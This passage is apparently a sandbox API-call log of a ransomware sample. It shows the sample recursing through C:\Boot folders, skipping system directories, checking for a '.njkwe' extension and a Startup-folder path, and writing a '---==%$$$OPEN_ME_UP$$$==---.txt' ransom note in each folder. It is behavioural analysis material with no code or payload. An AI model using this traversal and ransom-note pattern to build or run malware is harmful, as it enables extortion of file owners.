(in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.225] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0065.225] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="Windows") returned -1 [0065.225] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="$Recycle.bin") returned 1 [0065.225] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="System Volume Information") returned -1 [0065.225] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="Program Files") returned 1 [0065.225] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="Program Files (x86)") returned 1 [0065.225] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS") returned 22 [0065.226] lstrcmpW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0065.226] lstrcmpW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0065.226] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sr-Latn-CS", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.226] GetProcessHeap () returned 0xbe0000 [0065.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.226] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\*") returned 24 [0065.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0065.226] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.226] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.226] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.226] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.226] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.226] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\.") returned 24 [0065.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.226] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.226] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.226] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.226] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.226] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.226] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.226] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\..") returned 25 [0065.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.226] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.227] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 38 [0065.227] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.227] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.227] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.227] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.227] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.227] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.228] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.228] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.228] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.228] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.228] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.228] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 38 [0065.228] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.228] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.228] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.228] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.228] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.228] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.228] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0065.229] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 54 [0065.229] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\sr-latn-cs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.231] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.232] CloseHandle (hObject=0x428) returned 1 [0065.232] GetProcessHeap () returned 0xbe0000 [0065.232] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.232] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0065.232] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="Windows") returned -1 [0065.232] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="$Recycle.bin") returned 1 [0065.232] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="System Volume Information") returned -1 [0065.232] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="Program Files") returned 1 [0065.232] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="Program Files (x86)") returned 1 [0065.232] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS") returned 22 [0065.232] lstrcmpW (lpString1="sr-Latn-RS", lpString2=".") returned 1 [0065.232] lstrcmpW (lpString1="sr-Latn-RS", lpString2="..") returned 1 [0065.233] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sr-Latn-RS", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.233] GetProcessHeap () returned 0xbe0000 [0065.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.233] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\*") returned 24 [0065.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d60 [0065.233] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.233] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.233] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.233] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.233] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.233] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\.") returned 24 [0065.233] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.233] FindNextFileW (in: hFindFile=0xc19d60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.233] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.233] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.233] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.233] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.233] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.233] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\..") returned 25 [0065.233] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.233] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.233] FindNextFileW (in: hFindFile=0xc19d60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.233] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 38 [0065.233] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.233] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.233] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.234] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.234] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.234] FindNextFileW (in: hFindFile=0xc19d60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.234] FindClose (in: hFindFile=0xc19d60 | out: hFindFile=0xc19d60) returned 1 [0065.234] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 54 [0065.234] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\sr-latn-rs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.234] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.235] CloseHandle (hObject=0x428) returned 1 [0065.235] GetProcessHeap () returned 0xbe0000 [0065.235] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.235] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0065.235] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0065.235] lstrcmpiW (lpString1="sv-SE", lpString2="$Recycle.bin") returned 1 [0065.235] lstrcmpiW (lpString1="sv-SE", lpString2="System Volume Information") returned -1 [0065.235] lstrcmpiW (lpString1="sv-SE", lpString2="Program Files") returned 1 [0065.235] lstrcmpiW (lpString1="sv-SE", lpString2="Program Files (x86)") returned 1 [0065.235] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0065.235] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0065.235] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0065.235] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sv-SE", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.235] GetProcessHeap () returned 0xbe0000 [0065.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.235] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0065.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3e0 [0065.236] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.236] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.236] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.236] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.236] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.236] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0065.236] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.236] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.237] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.237] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0065.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.237] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.237] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.237] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.237] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.237] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.237] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.237] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0065.237] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.237] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.237] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.237] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.237] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.237] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.237] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.237] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.237] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.237] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.237] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.237] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui") returned 33 [0065.237] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.237] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.237] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.238] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.238] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.238] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.238] FindClose (in: hFindFile=0xc1a3e0 | out: hFindFile=0xc1a3e0) returned 1 [0065.238] wnsprintfW (in: pszDest=0xc27a58, 